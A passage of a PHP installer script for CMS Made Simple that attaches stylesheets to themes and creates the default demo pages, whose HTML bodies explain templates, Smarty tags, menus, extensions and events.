$leftsimple_1col_theme->add_stylesheet($css_list['Handheld']->get_id());
$leftsimple_1col_theme->add_stylesheet($css_list['Print']->get_id());
$leftsimple_1col_theme->add_stylesheet($css_list['Accessibility and cross-browser tools']->get_id());
$leftsimple_1col_theme->add_stylesheet($css_list['Navigation FatFootMenu']->get_id());
$leftsimple_1col_theme->save();

$ncleanblue_theme->add_stylesheet($css_list['ncleanblueutils']->get_id());
$ncleanblue_theme->add_stylesheet($css_list['ncleanbluecore']->get_id());
$ncleanblue_theme->add_stylesheet($css_list['Layout NCleanBlue']->get_id());
$ncleanblue_theme->save();

$shadowmenu_left_1col_theme->add_stylesheet($css_list['Layout Left sidebar + 1 column']->get_id());
$shadowmenu_left_1col_theme->add_stylesheet($css_list['Navigation ShadowMenu - Vertical']->get_id());
$shadowmenu_left_1col_theme->add_stylesheet($css_list['Accessibility and cross-browser tools']->get_id());
$shadowmenu_left_1col_theme->add_stylesheet($css_list['Print']->get_id());
$shadowmenu_left_1col_theme->add_stylesheet($css_list['Module News']->get_id());
$shadowmenu_left_1col_theme->add_stylesheet($css_list['Navigation FatFootMenu']->get_id());
$shadowmenu_left_1col_theme->save();

$shadowmenu_tab_2col_theme->add_stylesheet($css_list['Layout Top menu + 2 columns']->get_id());
$shadowmenu_tab_2col_theme->add_stylesheet($css_list['Navigation ShadowMenu - Horizontal']->get_id());
$shadowmenu_tab_2col_theme->add_stylesheet($css_list['Module News']->get_id());
$shadowmenu_tab_2col_theme->add_stylesheet($css_list['Accessibility and cross-browser tools']->get_id());
$shadowmenu_tab_2col_theme->add_stylesheet($css_list['Print']->get_id());
$shadowmenu_tab_2col_theme->add_stylesheet($css_list['Navigation FatFootMenu']->get_id());
$shadowmenu_tab_2col_theme->save();

$simplex_theme->add_stylesheet($css_list['Simplex Print']->get_id());
$simplex_theme->add_stylesheet($css_list['Simplex Core']->get_id());
$simplex_theme->add_stylesheet($css_list['Simplex Layout']->get_id());
$simplex_theme->add_stylesheet($css_list['Simplex Slideshow']->get_id());
$simplex_theme->save();

$topsimple_leftsubnav_1col_theme->add_stylesheet($css_list['Layout Top menu + 2 columns']);
$topsimple_leftsubnav_1col_theme->add_stylesheet($css_list['Navigation Simple - Horizontal']);
$topsimple_leftsubnav_1col_theme->add_stylesheet($css_list['Navigation Simple - Vertical']);
$topsimple_leftsubnav_1col_theme->add_stylesheet($css_list['Accessibility and cross-browser tools']);
$topsimple_leftsubnav_1col_theme->add_stylesheet($css_list['Module News']);
$topsimple_leftsubnav_1col_theme->add_stylesheet($css_list['Print']);
$topsimple_leftsubnav_1col_theme->add_stylesheet($css_list['Navigation FatFootMenu']);
$topsimple_leftsubnav_1col_theme->save();

$content_list = array();
ContentOperations::get_instance()->LoadContentType('content');

/////////////////////////
//  //  HOME PAGE  //  //
/////////////////////////

verbose_msg(ilang('install_createcontentpages'));
// Home / -1 / NCleanBlue  DEFAULT
$contentobj = new Content;
$contentobj->SetName('Home');
$contentobj->SetAlias();
$contentobj->SetMenuText('Home');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$simplex_theme->get_id());
$contentobj->SetTemplateId($template_list['Simplex']);
$contentobj->SetDefaultContent(TRUE); // this is the default page.
$contentobj->SetOwner(1);
$contentobj->SetParentId(-1);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>Congratulations! The installation worked. You now have a fully functional installation of CMS Made Simple and you are <em>almost</em> ready to start building your site.</p><p>If you chose to install the default content, you will see numerous pages available to read.  You should read them thoroughly  as these default pages are devoted to showing you the basics of how to begin working with CMS Made Simple.  On these example pages, templates, and stylesheets many of the features of the default installation of CMS Made Simple are described and demonstrated. You can learn much about the power of CMS Made Simple by absorbing this information.</p><p>To get to the Administration Console you have to login as the administrator (with the username/password you mentioned during the installation process) on your site at http://yourwebsite.com/cmsmspath/admin.  If this is your site click <a title="CMSMS Demo Admin Panel" href="admin">here</a> to login.</p><p>Read about how to use CMS Made Simple in the <a class="external" href="http://docs.cmsmadesimple.org/" title="CMS Made Simple Documentation" target="_blank">documentation</a>. In case you need any help the community is always at your service, in the  <a class="external" href="http://forum.cmsmadesimple.org" title="CMS Made Simple Forum" target="_blank">forum</a> or the <a class="external" href="http://www.cmsmadesimple.org/support/irc" title="Information about the CMS Made Simple IRC channel" target="_blank">IRC</a>.</p><h3>License</h3><p>CMS Made Simple is released under the <a class="external" href="http://www.gnu.org/licenses/licenses.html#GPL" title="General Public License" target="_blank">GPL</a> license and as such you don\'t have to leave a link back to us in these templates or on your site as much as we would like it.</p><p> Some third party add-on modules may include additional license restrictions.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

///////////////////////////////
//  //  HOW CMSMS WORKS  //  //
///////////////////////////////

// How CMSMS Works / -1 / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('How CMSMS Works');
$contentobj->SetAlias();
$contentobj->SetMenuText('How CMSMS Works');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId(-1);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>So how is a web-site created with CMS Made Simple? There are a couple of terms that are central to understanding this.</p><p>You first need to have templates, which is the HTML code for your pages. This is styled with CSS in one or more style sheets that are attached to each template. You then create pages that contain your websites content using one of these templates.</p><p>That doesn\'t sound too hard, does it? Basically you don\'t need to know any HTML or CSS to get a site up with CMS Made Simple. But if you want to customize it to your liking, consider learning some <a class="external" href="http://www.w3schools.com/css/" target="_blank">CSS</a>.</p><p>In the menu to the left you can read more about this, as well as more advanced features like the Menu Manager, additional extensions for adding many kinds of functionality to your site and the Event Manager for managing work flow. Last is a summary of the basic work flow when creating a site with CMS Made Simple.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Templates and stylesheets / How CMSMS Works / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Templates and stylesheets');
$contentobj->SetAlias();
$contentobj->SetMenuText('Templates and stylesheets');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['How CMSMS Works']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>A <em>template</em> is basically the HTML layout, or the design, of a page.  This is the work of the designer. Whatever is in a template is used on every  page that uses that template, meaning that the person editing the content  doesn\'t need any web design skills.</p><p>In the template there are placeholders for content and navigation areas. When  a user is visiting your site the page is automatically generated from the  template and the placeholders are filled with the content.</p><p>The template is the HTML structure. It is then styled in one or more  <em>style sheets</em> that are attached to each template. This styling is done  with CSS. So to get a site look the way you want you should be familiar with HTML and CSS on at least a basic level. But don\'t worry, there are themes with  ready-made templates and style sheets for you to download!</p><p>When you first install CMS Made Simple there are some basic templates that  you can use and customize to your needs. Those templates are described in the section {cms_selflink page=default_templates text=\'Default Templates Explained\'}. The designer of your site can also add new templates to make the site look any way you want. The CMSMS community also shares themes for anyone to download and use at <a class="external" href="http://themes.cmsmadesimple.org" target="_blank">The CMSMS Themes site</a>.</p><h3>Templates and style sheets in the CMSMS Admin Panel</h3><p>In the CMSMS Admin Panel you will find the templates and style sheets in the <strong>Layout</strong> menu.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Pages and navigation / How CMSMS Works / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Pages and navigation');
$contentobj->SetAlias();
$contentobj->SetMenuText('Pages and navigation');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['How CMSMS Works']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>Pages determine the structure of your web-site as seen in the admin Content &raquo; Pages page. Think of a web-site as a set  of pages. These pages are accessed through a menu. You can also link to a page  from within another page.</p><h3>Navigation/Menu</h3><p>The navigation, or the menu, is a set of links that help the user to navigate through  the pages on your web site. These links are automatically created by CMS Made  Simple from the page structure. This hierarchy is what drives the menu you see  on the left of this page.</p><p>Pages can be in several levels, like a tree of generations. The top level in  the menu are the parent pages. Each parent page can have children pages, which  in turn can be parents to other children.</p><p>The page template determines where on a page the navigation is placed.</p><p>You can create any kind of navigation you can dream of by customizing a menu  template for <em>Menu Manager</em>. However, the default templates should work  for most situations as the menu basically is just an unordered list that you  style to your liking with CSS. The web is full of good articles about styling a list of links, one of the best is <a class="external" href="http://css.maxdesign.com.au/listutorial/index.htm" target="_blank">listutorial at maxdesign</a></p><h3>Pages in the CMSMS Admin Panel</h3><p>You add pages, as well as other content (see next chapter), in the CMSMS Admin Panel from the Content &raquo; Pages menu.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Content / How CMSMS Works / Left simple navigation + 1 column
// Pages and navigation / How CMSMS Works / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Content');
$contentobj->SetAlias();
$contentobj->SetMenuText('Content');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['How CMSMS Works']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>The content is the information for the page. We have already mentioned that for each page on your site you  choose what template to use. When you add content to a page, it is automatically  placed in the placeholders of the template selected for that page.</p><p>A template can define one or several content areas, or content blocks. To add more content blocks to your template, use <code>{ldelim}content block=\'block name\'}</code>. These blocks will then appear as text areas when you edit or add a page that uses that template.</p><p>You can make a content block use only one line, instead of a full text area, by using the parameter oneline=true. That is, the full tag being: <code>{ldelim}content block=\'block name\' oneline=true}</code>. Read about more parameters in the help for the Content tag in the CMSMS Admin Panel, under Extensions &raquo; Tags.</p><h3>Content Types</h3><p>There are currently 6 main content types in version {cms_version} "{cms_versionname}". These content types determine the type of content for each menu item.</p><ul><li>Content</li><li>Error Page</li><li>External Page Link</li><li>Internal Page Link</li><li>Section Header</li><li>Separator</li></ul><p>The <strong>Content</strong> type is simply a regular page. Normally this is the only one you will use. That is what this page you are reading is. Here you can put any content that you would put on a regular page. The layout of these types of pages are controlled by the templates. For each <strong>content</strong> page you create you must add the title, menu text, choose if it is going to have a parent and choose a template for it.  If you login as admin and change the template of this page, you will see exactly how it works.</p><p>The <strong>Error Page</strong> type is just what it sounds like, a page you set for "404 page not found" errors, where you can add the content that shows when a 404 error occurs, a target type and title, you can also choose the template it uses, it has no parent as it is not part of the menu.</p><p>The <strong>External Page Link</strong> type is just what it sounds like, a link to another external page and you add the title, menu text, choose if it is going to have a parent and a destination page along with the target setting and other options that a content type page has. This <strong>external page link</strong> type also shows up in the menu following the same hierarchy rules as the <strong>content</strong> type.</p><p>The <strong>Internal Page Link</strong> type is also just what it sounds like, a link to another internal page. This <strong>internal page link</strong> type also shows up in the menu following the same hierarchy rules as the <strong>content</strong> type and you add the title, menu text, choose if it is going to have a parent and a destination page along with the target setting and other options that a content type page has.</p><p>The <strong>Section Header</strong> type is used to break up menus into groupings (sections). This is unrelated to the hierarchy, as the section headers have no associated pages with them but can be used to group a set of links of similar content under them. They are just a little bit of text to say what the next few links are in reference to.</p><p>The <strong>Separator</strong> type is just what it sounds like, a separator that appears on the menus. This type follows the hierarchy set in content management pages.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Menu Manager / How CMSMS Works / Left simple navigation + 1 column17
$contentobj = new Content;
$contentobj->SetName('Menu Manager');
$contentobj->SetAlias();
$contentobj->SetMenuText('Menu Manager');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['How CMSMS Works']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>The Menu Manager is a module that reads your page hierarchy and builds a navigation using a \'Menu Manager Template\'. By default a few sample menu manager templates are included with your default installation. For most users these are enough, as a menu basically is just an unordered list that is styled with CSS.</p><p>The Menu Manager module also accepts various optional attributes (parameters) in the {ldelim}menu{rdelim} tag to allow you to customize its behavior. You can see the list and explanation of these parameters in the Menu Manager Help which can be found on the right side of the screen when you click on "Layout &raquo; Menu Manager" in the administration console.</p><p>Customizing templates in the Menu Manager is as simple as clicking the \'Import Template to Database\' button, which will then allow you to create a template with a new name, and modify the layout of the template. You can use your new navigation template by specifying the new name in the call to {ldelim}menu{rdelim} in your page template. i.e: {ldelim}menu template=\'mynewtemplate\'{rdelim}.</p><h3>Menu Manager in the CMSMS Admin Panel</h3><p>Read more about how to do this in the <strong>Help</strong> for the Menu Manager in the CMSMS Admin Panel. It can be found in the Layout menu.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Extensions / How CMSMS Works / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Extensions');
$contentobj->SetAlias();
$contentobj->SetMenuText('Extensions');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['How CMSMS Works']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>There are three kinds of extensions, that can add many kinds of functionality to your default CMS Made Simple install. They are called tags, user defined tags, and modules.</p><h3>Tags</h3><p>Tags are the simplest form of extensions. They are designed to accomplish just one small and specific task.</p><p>There are a number of custom tags available with CMS Made Simple. To find what kind of tags are available look in Extensions &raquo; Tags in the Admin Panel.</p><p>To insert any of these in a template or a page, simply type e.g. <code>{ldelim}content}</code>. Many of these Smarty tags are used as placeholders in a template, i.e. placeholders for content, navigation, breadcrumbs etc.</p><p>Website developers who have a bit of PHP experience will find it easy to create and share their own custom tags.</p><h3>User defined tags</h3><p>Users can also create their own tags to insert in templates or pages., these are called user defined tags. They are snippets of php code (but without the &lt;?php and ?&gt; surrounding them), providing the ability to add re-usable pieces of php functionality to your site. User defined tags are inserted in templates and pages just like tags: <code>{ldelim}tagname}</code>.</p><p>Typically, user defined tags provide a utility that is special to a website, and likely won\'t need to be re-used on another site. Also they are typically small and used for simple tasks.</p><h3>Modules</h3><p>Modules are the highest level of plugin in the CMS Made Simple environment. They are designed to allow developers to implement complex tasks within CMSMS. A module typically provides advanced functionality, usually interacts with the database in complex ways, and may provide numerous reports or forms on the website. Additionally, a module may have an administrative interface to allow manipulating its data and its settings.</p><p>An extremely well defined API <em>(Application Programming Interface)</em> has been written to allow module developers to write complex, intricate, and fully functioning applications for use within a CMSMS powered website.</p><p>There are {cms_selflink page=\'modules\' text=\'a few modules included\'} with the default installation of CMS Made Simple. Other popular modules are Frontend Users, Album, Calendar, Guestbook and Form Builder.</p><p>The ModuleManager module (included with CMS Made Simple) allows browsing a list of available modules, reading about them, and then installing them on your website.</p><p>To insert modules in a template or a page, you actually use the module name as a parameter to the <code>{ldelim}cms_module}</code> tag. It looks like this: <code>{ldelim}cms_module module=\'modulename\' parameter1=\'this\' parameter2=5 parameter3=\'that\'}</code>. It is normal for modules to accept parameters to effect changes to their default behavior, though it is not always required.</p><h3>Read more</h3><p>You can read more about extensions in the <a class="external" href="http://docs.cmsmadesimple.org/modules/add-ons">CMSMS documentation</a>.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Event Manager / How CMSMS Works / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Event Manager');
$contentobj->SetAlias();
$contentobj->SetMenuText('Event Manager');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['How CMSMS Works']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>Events are a new powerful way of assigning actions to events. For example if you would like to send an email to the site administrator when a new file is uploaded or a new page is created by another user you could add some code to those events to be executed when that event happens.</p><p>In brief here\'s how it works:</p><p>a) A module, or the core, can register, and then Send Events such as "newNews", or "newFronteEndUser" or "fileUploaded", "editPage", etc, etc, etc. there\'s some 50 events in the core at the moment, and then uploads and frontend users have been configured to send events, We still have to do selfreg, etc, etc, etc.</p><p>b) There are pages in the admin to allow you to specify which modules, and/or user tags should handle those events, and the order that each of those handlers should be called in.</p><p>c) If one of the handlers of an event is a module, then.... the modules DoEvent method is called with the name of the event, and whatever data it wants to send. Each triggered event needs to be documented, but as of this moment, most are.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Workflow / How CMSMS Works / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Workflow');
$contentobj->SetAlias();
$contentobj->SetMenuText('Workflow');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['How CMSMS Works']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>These are the basic steps when creating a website with CMS Made Simple:</p><ol><li><em>Plan</em> -- Determine what pages you want (structure) and how you want  these pages to look (design). </li><li><em>Create Templates</em> -- Create one or several template(s) that  determine the layout of your pages. </li><li><em>Style the Templates</em> -- Attach one or more stylesheets to each  template and style the layout and content with CSS. </li><li><em>Create Pages</em> -- Then you create pages, add content to them and  select what template to use for each page. </li></ol><p>When a user navigates to your site the page is created from the template,  adding the content where the placeholder(s) are in the template.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// Where do I get Help / How CMSMS Works / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Where do I get help?');
$contentobj->SetAlias();
$contentobj->SetMenuText('Where do i get help?');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetParentId($content_list['How CMSMS Works']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>The CMS Made Simple community is always at your service if you need some help with your site. Here is where you find more information and support:</p><ul><li><a class="external" href="http://docs.cmsmadesimple.org/">The CMSMS Documentation Website</a> -- Start here, the documentation is maintained by the CMSMS Dev-team</li><li><a class="external" href="http://forum.cmsmadesimple.org/">The CMSMS Forums</a> -- here you can search for answers to your questions or ask just about anything.</li><li><a class="external" href="http://cmsmadesimple.org/main/support/IRC">IRC</a> -- IRC is short for Internet Relay Chat and is like a community chat. Many developers hang out here and others that are ready to discuss and give support.</li></ul><p>Please remember that people involved in developing and supporting CMSMS have day jobs and other duties and might not be available 24/7. Be patient and polite and you will get better answers.</p><p>Hope you will enjoy using CMS Made Simple for creating your web sites! If you want to contribute to the development yourself, you are very welcome to do so. You can contact us on <a class="external" href="http://cmsmadesimple.org/main/support/IRC">IRC</a> or hit the <a class="external" href="http://forum.cmsmadesimple.org/">forums</a> to get involved.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

///////////////////////////////////////////
//  //  DEFAULT TEMPLATES EXPLAINED  //  //
///////////////////////////////////////////

// Default Templates Explained / -1 / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('Default Templates Explained');
$contentobj->SetAlias();
$contentobj->SetMenuText('Default Templates Explained');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetAlias('default_templates');
$contentobj->SetParentId(-1);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
			      '<p>CMS Made Simple {cms_version} was installed with numerous default templates (you choose this during the installation process). These are to display some of the features of CMS Made Simple and to give you a head start when creating your own web sites.</p><p>The tags that are unique to templates in CMS Made Simple are described on the page {cms_selflink page=\'cmsms_tags\' text=\'CMSMS tags in the templates\'} (see menu to the left). Click on any link beneath that page in the menu to the left to see what the default templates look like.</p><h4>Changing the style of Default Templates</h4><p>All of the templates and style sheets have comments throughout them to help you find where to change the look of them.</p><h3>Menus/navigation</h3><p>Two kinds of navigation are used in these templates. For each there is a menu template in the Menu Manager. <strong>CSSMenu </strong>is a dropdown menu using only CSS. Well, for Internet Explorer 6 some JavaScript has to be used... Two of the page templates are using CSSMenu for navigation, {cms_selflink page=\'cssmenu_horizontal\' text=\'one with the menu horizontally at the top\'} and the other {cms_selflink page=\'cssmenu_vertical\' text=\'with the menu vertically to the left\'}.</p><p>The other navigation type is what we call <strong>Simple Navigation</strong>. That is just an unordered list that gets its style and appearance from the style sheets (CSS). Also here {cms_selflink page=\'top_left\' text=\'one page template is using a horizontal simple navigation\'} and the other {cms_selflink page=\'navleft\' text=\'a vertical menu\'}.</p><p>The menu tag in each template is used like this: <code>{ldelim}menu template=\'cssmenu\'}</code>, where the <code>cssmenu</code> is the name of the Menu Manager template, if you make a custom menu template you don\'t need to use the  on the end. More parameters can be used, for example to start a menu from the second level, collapse the children pages until the parent is clicked etc. Read more about that in the Menu Manager Help in the Admin Panel.</p>');
$contentobj->Save();
$content_list[$contentobj->Name()] = $contentobj->Id();

// CMSMS tags in the templates / Default Templates Exlplained / Left simple navigation + 1 column
$contentobj = new Content;
$contentobj->SetName('CMSMS tags in the templates');
$contentobj->SetAlias();
$contentobj->SetMenuText('CMSMS tags in the templates');
$contentobj->SetPropertyValue('searchable',1);
$contentobj->SetPropertyValue('design_id',$leftsimple_1col_theme->get_id());
$contentobj->SetTemplateId($template_list['Left simple navigation + 1 column']);
$contentobj->SetOwner(1);
$contentobj->SetAlias('cms_tags');
$contentobj->SetParentId($content_list['Default Templates Explained']);
$contentobj->SetActive(TRUE);
$contentobj->SetShowInMenu(TRUE);
$contentobj->SetCachable(TRUE);
$contentobj->SetPropertyValue('content_en',
	'<p>Here we explain the tags that are used in the default templates that are specific to templates in CMS Made Simple. The rest of the templates are just pure HTML. You can read more about that in the <a class="external" href="http://docs.cmsmadesimple.org/layout/create-your-own-template">documentation website</a>.</p><div class="templatecode"><h3>Page title</h3><pre>&lt;title&gt;{ldelim}sitename} - {ldelim}title}&lt;/title&gt;</pre><p>For each page using these tags in a template the tags are replaced with the site name you specify in Site Admin &raquo; Global settings and the title you specify when you add/edit each page.</p><p><em>Read more</em> about the <code>{ldelim}sitename}</code> and <code>{ldelim}title}</code> tags in Extensions &raquo; Tags in the Admin Panel.</p></div><div class="templatecode"><h3>Metadata</h3><pre>{ldelim}metadata}</pre><p>This tag adds to your page any metadata that you have specified in Site Admin &raquo; Global settings and also page specific metadata that you can add under the Options tab when adding/editing a page.</p><p>It is also used for knowing the base folder for your site when using pretty URLs. So don\'t remove this if you use Pretty URLs!</p><p><em>Read more</em> about the <code>{ldelim}metadata}</code>tag in Extensions &raquo; Tags in the Admin Panel.</p></div><div class="templatecode"><h3>Stylesheets (deprecated)</h3><pre>{ldelim}stylesheet}</pre><p>This tag links to all style sheets (CSS) that you have attached to a template. It means that you only have to add this tag once and all attached style sheets will be linked automatically.</p><p><em>Read more</em> about the <code>{ldelim}stylesheet}</code> tag in Extensions &raquo; Tags in the Admin Panel.</p></div><div class="templatecode"><h3>Stylesheets</h3><pre>{ldelim}cms_stylesheet}</pre><p>This tag is the newer version of the tag above. The tag links to all style sheets (CSS) that you have attached to a template. It means that you only have to add this tag once and all attached style sheets will be linked automatically.</p><p>The new tag allows you to use smarty variables like [[$red]] to indicate a color, and one change will change it througout your layout. The new tag requires that [[root_url]]/ be put in front of images, as the stylesheets are cached.</p><p><em>Read more</em> about the <code>{ldelim}cms_stylesheet}</code> tag in Extensions &raquo; Tags in the Admin Panel.</p></div><div class="templatecode"><h3>Relational links</h3><pre>{ldelim}cms_selflink dir="start" rellink=1}{ldelim}cms_selflink dir="prev" rellink=1}{ldelim}cms_selflink dir="next" rellink=1}</pre><p>These are relational links for interconnections between pages, which is good for accessibility and Search Engine Optmization</p><p><em>Read more</em> about the <code>{ldelim}cms_selflink}</code> tag in Extensions &raquo; Tags in the Admin Panel.</p></div><div class="templatecode"><h3>Page width in Internet Explorer 6</h3><pre>{ldelim}literal}&lt;script type="text/JavaScript"&gt;&lt;!--//pass min and max -measured against window widthfunction P7_MinMaxW(a,b){ldelim}	var nw="auto",w=document.documentElement.clientWidth;	if(w&gt;=b){ldelim}nw=b+"px";}if(w&lt;=a){ldelim}nw=a+"px";}return nw;}//--&gt;&lt;/script&gt;&lt;!--[if lte IE 6]&gt;&lt;style type="text/css"&gt;#pagewrapper {ldelim}width:expression(P7_MinMaxW(720,950));}#container {ldelim}height: 1%;}&lt;/style&gt;&lt;![endif]--&gt;{ldelim}/literal}</pre><p>This isn\'t a tag really, but displays how to insert JavaScript in a CMSMS template.</p><p>The default templates use fluid page width. But Internet Explorer 6 doesn\'t understand min-width and max-width, so for that browser the min and max page width is set with this JavaScript. For other browsers the page width is set in the style sheets beginning with "Layout ..."</p></div><div class="templatecode"><h3>Skip links for accessibility</h3><pre>{ldelim}anchor anchor=\'main\' title=\'Skip to content\' accesskey=\'s\' text=\'Skip to content\'}</pre><p>Anchor links (links to an anchor in the same page) are inserted with the <code>{ldelim}anchor}</code> tag. In the default templates this is used for skip links that are visible to screen readers, but hidden with CSS to visual browsers.</p><p><em>Read more</em> about the <code>{ldelim}anchor}</code> tag in Extensions &raquo; Tags in the Admin Panel.</p></div><div class="templatecode"><h3>Header with logo image that links to default page</h3><pre>{ldelim}cms_selflink dir="start" text="$sitename"}</pre><p>In the header the &lt;h1&gt; tag (hidden by CSS) is a link to the page that is selected as the default page. The <code>dir="start"</code> parameter in the {ldelim}cms_selflink} tag is used for this. To get the site name as the text for the link, the <code>$sitename</code> variable is used.</p><p><em>Read more</em> about the <code>{ldelim}cms_selflink}</code> tag in Extensions &raquo; Tags in the Admin Panel.</p></div><div class="templatecode"><h3>Search</h3><pre>{ldelim}search}</pre><p>To insert a search form on your site, simply use the {ldelim}search} tag. Search is actually a module and should therefore be called as a parameter in the {ldelim}cms_module} tag, like this: <code>{ldelim}cms_module module=\'search\'}</code>. But to simplify matters, we did a wrapper tag so that it\'s easier to remember.</p><p><em>Read more</em> about the Search module in Extensions &raquo; Modules in the Admin Panel.</p></div><div class="templatecode"><h3>Breadcrumbs</h3><pre>{ldelim}breadcrumbs starttext=\'You are here\' root=\'Home\' delimiter=\'&raquo;\'}</pre><p>Breadcrumbs is a path to the current page. In the default templates we have chosen to put the text \'You are here\' before the path and force \'Home\' to always be the root in the path, even if it isn\'t. With the delimiter parameter you can select the delimiter that separates entries in the path.</p><p><em>Read more</em> about the <code>{ldelim}breadcrumbs}</code> tag in Extensions &raquo; Tags in the Admin Panel.</p></div><div class="templatecode"><h3>Navigation</h3><pre>{ldelim}menu template=\'simple navigation\' collapse=\'1\'}</pre><p>This is how you insert a menu where you want it to appear. Like the <code>{ldelim}search}</code> tag, this is actually just a wrapper tag, as the Menu Manager is a module.</p><p>In the default templates the menu manager template that is used for the menus are stored in files. That\'s why you see the .tpl extension in the template parameter. But you can easily import menu templates to the database and edit them directly in the Admin Panel. Then you simply omit the .tpl extension in the template parameter.</p><p><em>Read more</em> about the Menu Manager module in Extensions &raquo; Modules in the Admin Panel.</p></div><div class="templatecode"><h3>News</h3><pre>{ldelim}news number=\'3\' detailpage=\'news\'}</pre><p>This tag will display the last three news articles. When clicking a news article to read the details, it is opened on the page with the page alias \'news\'. That\'s what the detailpage parameter is doing.</p><p>Like all core modules there is a wrapper tag for the News module, to make it easier to use.</p><p><em>Read more</em> about the News module tag in Extensions &raquo; News in the Admin Panel.</p></div><div class="templatecode"><h3>Print button</h3><pre>{ldelim}print showbutton=true script=true}</pre><p>The <code>{ldelim}print}</code> tag is used to insert a print link. With the showbutton parameter set to true we have told the tag to output a button instead of text. The script parameter set to true means the print dialog window opens when clicking the button, for immediate printing.</p><p>The <code>{ldelim}print}</code> tag prints everything that is in your <code>{ldelim}content}</code> tag, that is only the content for a page.</p><p><em>Read more</em> about the <code>{ldelim}print}</code> tag in Extensions &raquo; Tags in the Admin 